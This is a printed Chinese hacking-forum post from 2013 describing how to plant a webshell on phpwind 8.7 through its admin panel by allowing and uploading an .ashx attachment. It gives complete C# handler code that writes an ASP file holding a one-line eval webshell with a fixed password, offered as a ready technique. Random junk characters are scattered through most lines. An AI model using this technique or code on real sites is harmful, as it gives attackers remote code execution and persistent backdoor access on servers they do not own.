中国网络渗透测试联盟

标题: phpwind 8.7 后台拿shell [打印本页]
作者: admin    时间: 2013-7-26 12:41
标题: phpwind 8.7 后台拿shell
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
: T+ h* t, f( f3 ]2 F
9 E" O* U% I5 e8 B1 M5 G群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
6 L" T! x6 L) Z; ~4 |" V
0 P5 h* }9 N  a$ V! F. W- ~发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整7 x8 U8 Q; a0 j  i4 `3 p6 Z

) E0 h( a& A5 F2 z6 P% N然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
; L9 E+ b: a3 i
0 Y0 g1 i. e5 F$ e8 |* G打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
) W8 m  ?# V. }6 T. M" l2 S
4 ?3 I' T# B/ L+ }下面是代码:) a: a# [  A5 s0 E8 Z7 H

) g: }8 C! }- I7 u<%@ WebHandler Language="C#"Class="Handler" %>
; m3 E7 c+ o7 G( d4 Yusing System;
$ Q4 B9 s$ Z. uusing System.Web;( [1 }7 D/ g) z) u. z
using System.IO;
7 k5 |  x( y3 |# y9 E" i; W" }public class Handler : IHttpHandler {5 V4 ^5 t7 [8 b' C
public void ProcessRequest (HttpContext context) {
* t6 J4 {( e, C! ^context.Response.ContentType = "text/plain";& V) f' H& O' {6 b# Q2 f+ f% X: p; a& ?
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
, n6 C# S+ |* H, u  m  rfile1.Write("<%eval request(\"r00ts\")%>");$ ]) K: F% O: c4 S: s) J6 L
file1.Flush();
7 S8 |; j8 e# F% q  Xfile1.Close();
' K# Q3 r! r" n. T8 _0 X2 z% I7 C}
  @' d& K. V7 P& Z+ _) D( O5 Ypublic bool IsReusable {
) ]* l" m8 C5 X8 [! n' \! Rget {
: J) n( E( w: B9 o2 E& ~: S1 ^return false;
. r( w4 L1 g9 c8 {( X}
1 l: c5 H: a- X% L8 W}
* ]3 L- ~( p) F8 S  r}
# g$ Q, _, ^8 d& g! |



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2